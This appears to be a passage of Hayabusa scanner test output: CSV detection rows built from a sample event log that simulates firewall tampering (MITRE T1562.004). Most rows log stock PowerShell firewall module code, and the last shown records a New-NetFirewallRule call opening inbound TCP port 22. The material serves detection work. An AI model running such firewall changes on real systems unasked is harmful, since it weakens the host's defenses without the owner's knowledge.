$__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'CertValidationLevel'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.CRLCheck'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('AllowIPsecThroughNAT')) { [object]$__cmdletization_value = ${AllowIPsecThroughNAT} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'AllowIPsecThroughNAT'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.IPsecThroughNAT'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'AllowIPsecThroughNAT'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.IPsecThroughNAT'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('MaxSAIdleTimeSeconds')) { [object]$__cmdletization_value = ${MaxSAIdleTimeSeconds} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'MaxSAIdleTimeSeconds'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'MaxSAIdleTimeSeconds'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('KeyEncoding')) { [object]$__cmdletization_value = ${KeyEncoding} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'KeyEncoding'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.KeyEncoding'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'KeyEncoding'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.KeyEncoding'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('EnablePacketQueuing')) { [object]$__cmdletization_value = ${EnablePacketQueuing} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'EnablePacketQueuing'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PacketQueuing'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'EnablePacketQueuing'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PacketQueuing'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('cim:ModifyInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallSetting.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Set-NetFirewallSetting' -Alias '*'",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx
+2021-04-23 19:09:45.531 +09:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-StrictMode): ""Set-StrictMode"" ParameterBinding(Set-StrictMode): name=""Off""; value=""True""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx
+2021-04-23 19:09:45.533 +09:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx
+2021-04-23 19:09:45.535 +09:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Get-NetFirewallSetting"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx
+2021-04-23 19:09:45.535 +09:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Set-NetFirewallSetting"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx
+2021-04-23 19:09:45.555 +09:00,srvdefender01.offsec.lan,4104,medium,,Potentially Malicious PwSh,"#requires -version 3.0 try { Microsoft.PowerShell.Core\Set-StrictMode -Off } catch { } $script:MyModule = $MyInvocation.MyCommand.ScriptBlock.Module $script:ClassName = 'root/standardcimv2/MSFT_NetGPO' $script:ClassVersion = '1.0.0' $script:ModuleVersion = '1.0.0.0' $script:ObjectModelWrapper = [Microsoft.PowerShell.Cmdletization.Cim.CimCmdletAdapter] $script:PrivateData = [System.Collections.Generic.Dictionary[string,string]]::new() Microsoft.PowerShell.Core\Export-ModuleMember -Function @() function __cmdletization_BindCommonParameters { param( $__cmdletization_objectModelWrapper, $myPSBoundParameters ) if ($myPSBoundParameters.ContainsKey('CimSession')) { $__cmdletization_objectModelWrapper.PSObject.Properties['CimSession'].Value = $myPSBoundParameters['CimSession'] } if ($myPSBoundParameters.ContainsKey('ThrottleLimit')) { $__cmdletization_objectModelWrapper.PSObject.Properties['ThrottleLimit'].Value = $myPSBoundParameters['ThrottleLimit'] } if ($myPSBoundParameters.ContainsKey('AsJob')) { $__cmdletization_objectModelWrapper.PSObject.Properties['AsJob'].Value = $myPSBoundParameters['AsJob'] } } function Open-NetGPO { [CmdletBinding(PositionalBinding=$false)] [OutputType([System.String])] param( [Parameter(ParameterSetName='Open0', Mandatory=$true, Position=0)] [string] ${PolicyStore}, [Parameter(ParameterSetName='Open0')] [string] ${DomainController}, [Parameter(ParameterSetName='Open0')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='Open0')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='Open0')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('PolicyStore')) { [object]$__cmdletization_value = ${PolicyStore} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'PolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'PolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('DomainController')) { [object]$__cmdletization_value = ${DomainController} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'DomainController'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'DomainController'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'GPOSession'; ParameterType = 'System.String'; Bindings = 'Out'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('Open', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_methodInvocationInfo) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetGPO.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Open-NetGPO' -Alias '*' function Save-NetGPO { [CmdletBinding(PositionalBinding=$false)] param( [Parameter(ParameterSetName='Save1', Mandatory=$true, Position=0)] [string] ${GPOSession}, [Parameter(ParameterSetName='Save1')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='Save1')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='Save1')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('GPOSession')) { [object]$__cmdletization_value = ${GPOSession} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'GPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'GPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('Save', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_methodInvocationInfo) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetGPO.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Save-NetGPO' -Alias '*'",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx
+2021-04-23 19:09:45.555 +09:00,srvdefender01.offsec.lan,4104,info,,PwSh Scriptblock Log,"#requires -version 3.0 try { Microsoft.PowerShell.Core\Set-StrictMode -Off } catch { } $script:MyModule = $MyInvocation.MyCommand.ScriptBlock.Module $script:ClassName = 'root/standardcimv2/MSFT_NetGPO' $script:ClassVersion = '1.0.0' $script:ModuleVersion = '1.0.0.0' $script:ObjectModelWrapper = [Microsoft.PowerShell.Cmdletization.Cim.CimCmdletAdapter] $script:PrivateData = [System.Collections.Generic.Dictionary[string,string]]::new() Microsoft.PowerShell.Core\Export-ModuleMember -Function @() function __cmdletization_BindCommonParameters { param( $__cmdletization_objectModelWrapper, $myPSBoundParameters ) if ($myPSBoundParameters.ContainsKey('CimSession')) { $__cmdletization_objectModelWrapper.PSObject.Properties['CimSession'].Value = $myPSBoundParameters['CimSession'] } if ($myPSBoundParameters.ContainsKey('ThrottleLimit')) { $__cmdletization_objectModelWrapper.PSObject.Properties['ThrottleLimit'].Value = $myPSBoundParameters['ThrottleLimit'] } if ($myPSBoundParameters.ContainsKey('AsJob')) { $__cmdletization_objectModelWrapper.PSObject.Properties['AsJob'].Value = $myPSBoundParameters['AsJob'] } } function Open-NetGPO { [CmdletBinding(PositionalBinding=$false)] [OutputType([System.String])] param( [Parameter(ParameterSetName='Open0', Mandatory=$true, Position=0)] [string] ${PolicyStore}, [Parameter(ParameterSetName='Open0')] [string] ${DomainController}, [Parameter(ParameterSetName='Open0')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='Open0')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='Open0')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('PolicyStore')) { [object]$__cmdletization_value = ${PolicyStore} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'PolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'PolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('DomainController')) { [object]$__cmdletization_value = ${DomainController} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'DomainController'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'DomainController'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'GPOSession'; ParameterType = 'System.String'; Bindings = 'Out'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('Open', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_methodInvocationInfo) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetGPO.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Open-NetGPO' -Alias '*' function Save-NetGPO { [CmdletBinding(PositionalBinding=$false)] param( [Parameter(ParameterSetName='Save1', Mandatory=$true, Position=0)] [string] ${GPOSession}, [Parameter(ParameterSetName='Save1')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='Save1')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='Save1')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('GPOSession')) { [object]$__cmdletization_value = ${GPOSession} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'GPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'GPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('Save', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_methodInvocationInfo) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetGPO.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Save-NetGPO' -Alias '*'",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx
+2021-04-23 19:09:45.555 +09:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-StrictMode): ""Set-StrictMode"" ParameterBinding(Set-StrictMode): name=""Off""; value=""True""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx
+2021-04-23 19:09:45.556 +09:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx
+2021-04-23 19:09:45.556 +09:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Open-NetGPO"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx
+2021-04-23 19:09:45.557 +09:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Save-NetGPO"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx
+2021-04-23 19:09:45.683 +09:00,srvdefender01.offsec.lan,4104,info,,PwSh Scriptblock Log,"function __cmdletization_BindCommonParameters { param( $__cmdletization_objectModelWrapper, $myPSBoundParameters ) if ($myPSBoundParameters.ContainsKey('CimSession')) { $__cmdletization_objectModelWrapper.PSObject.Properties['CimSession'].Value = $myPSBoundParameters['CimSession'] } if ($myPSBoundParameters.ContainsKey('ThrottleLimit')) { $__cmdletization_objectModelWrapper.PSObject.Properties['ThrottleLimit'].Value = $myPSBoundParameters['ThrottleLimit'] } if ($myPSBoundParameters.ContainsKey('AsJob')) { $__cmdletization_objectModelWrapper.PSObject.Properties['AsJob'].Value = $myPSBoundParameters['AsJob'] } }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx
+2021-04-23 19:09:46.214 +09:00,srvdefender01.offsec.lan,2004,medium,,Added Rule in Windows Firewall with Advanced Security,,../hayabusa-rules/sigma/builtin/firewall_as/win_firewall_as_add_rule.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx
+2021-04-23 19:09:46.469 +09:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(New-NetFirewallRule): ""New-NetFirewallRule"" ParameterBinding(New-NetFirewallRule): name=""Name""; value=""sshd"" ParameterBinding(New-NetFirewallRule): name=""DisplayName""; value=""OpenSSH Server (sshd)"" ParameterBinding(New-NetFirewallRule): name=""Enabled""; value=""True"" ParameterBinding(New-NetFirewallRule): name=""Direction""; value=""Inbound"" ParameterBinding(New-NetFirewallRule): name=""Protocol""; value=""TCP"" ParameterBinding(New-NetFirewallRule): name=""Action""; value=""Allow"" ParameterBinding(New-NetFirewallRule): name=""LocalPort""; value=""22"" ParameterBinding(New-NetFirewallRule): name=""PolicyStore""; value="""" ParameterBinding(New-NetFirewallRule): name=""GPOSession""; value="""" ParameterBinding(New-NetFirewallRule): name=""Description""; value="""" ParameterBinding(New-NetFirewallRule): name=""Group""; value="""" ParameterBinding(New-NetFirewallRule): name=""LooseSourceMapping""; value=""False"" ParameterBinding(New-NetFirewallRule): name=""LocalOnlyMapping""; value=""False"" ParameterBinding(New-NetFirewallRule): name=""Owner""; value="""" ParameterBinding(New-NetFirewallRule): name=""Program""; value="""" ParameterBinding(New-NetFirewallRule): name=""Package""; value="""" ParameterBinding(New-NetFirewallRule): name=""Service""; value="""" ParameterBinding(New-NetFirewallRule): name=""LocalUser""; value="""" ParameterBinding(New-NetFirewallRule): name=""RemoteUser""; value="""" ParameterBinding(New-NetFirewallRule): name=""RemoteMachine""; value="""" ParameterBinding(New-NetFirewallRule): name=""OverrideBlockRules""; value=""False"" ParameterBinding(New-NetFirewallRule): name=""ThrottleLimit""; value=""0"" ParameterBinding(New-NetFirewallRule): name=""AsJob""; value=""False""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall 